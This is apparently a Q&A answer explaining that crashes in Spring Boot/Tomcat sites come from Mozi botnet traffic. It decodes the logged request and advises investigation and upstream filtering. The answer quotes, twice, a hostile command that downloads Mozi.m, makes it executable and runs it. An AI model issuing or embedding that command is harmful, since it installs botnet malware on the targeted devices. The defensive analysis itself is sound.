Unrecognized method names crashing springboot sites [closed]

java docker web spring spring-boot

Solution 1:

TL;DR

Your system / router is under attack - it looks like somebody is trying to install "Mozi malware" - see https://blog.lumen.com/new-mozi-malware-family-quietly-amasses-iot-bots/

Details

Your tomcat is called with something not really being a HTML method. So the caller - whatever it is - does very strange things. It looks like a script is sent instead of HTTP message.

...After a certain amount of time all of these sites go down...

Looks like a denial of service because extreme bad network traffic.

Analyze

Let's analyze your output:

java.lang.IllegalArgumentException: Invalid character found in method name [27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$]. HTTP method names must be tokens
    at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:417) ~[tomcat-embed-core-9.0.39.jar!/:9.0.39]

Reading the implementation we see

// from Http11InputBuffer.java ... (tomcat-embed-core-9.0.48.jar)

    // Avoid unknown protocol triggering an additional error
    request.protocol().setString(Constants.HTTP_11);
    String invalidMethodValue = parseInvalid(parsingRequestLineStart, byteBuffer);
    throw new IllegalArgumentException(sm.getString("iib.invalidmethod", invalidMethodValue));

//...

Having message properties file containing:

iib.invalidmethod=Invalid character found in method name [{0}]. HTTP method names must be tokens

and your given exception the string (0) is:

27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$

unencoded:


'wget http://%s:%d/Mozi.m -O -> /tmp/Mozi.m;chmod 777  /tmp/Mozi.m;/tmp/Mozi.m dlink.mips $'

Looks like a script is sent which tries to fetch something called "Mozi.m", makes it executable and call it... ups...

So....doing a simple internet research about "Mozi.m"... I found:

  • https://www.virustotal.com/gui/file/e629334def73be9e166ecdd9d5d73d6be97ef7f7d16f05383892332acb324b73/detection/f-e629334
  • https://blog.lumen.com/new-mozi-malware-family-quietly-amasses-iot-bots/

So IMO it looks like there is somebody is attacking the routers with mass HTTP requests, trying to break in. The routers forward the malicous request and tomcat does handle and reject them (correctly) but having too many requests the system goes down...

Further steps

Consult your cyber security department or consult a security expert and investigate as soon as possible what happened and if your system was tampered/hijacked.

IMO those requests should be filtered before tomcat.

Related

What does " in accounts of" mean in this context? And i don't understand the sentence
Origin of “Fish” as an exclamation or mild oath
"Poisoned with" or "Poisoned by"?
Do we still use “for” like “because”? [duplicate]
What's the term for a window cut into a hedge?
Understanding a math problem
"isn't much" vs "aren't much" vs "aren't much of"
Correct usage of the idiom "We will cross that bridge when we come to it" [closed]
What is real time indicator? [closed]
TradingView - Pine Editor Error: Could not get Pine source code
Nouns modified by adverbs?
Antecedents of the relative clauses include both people and things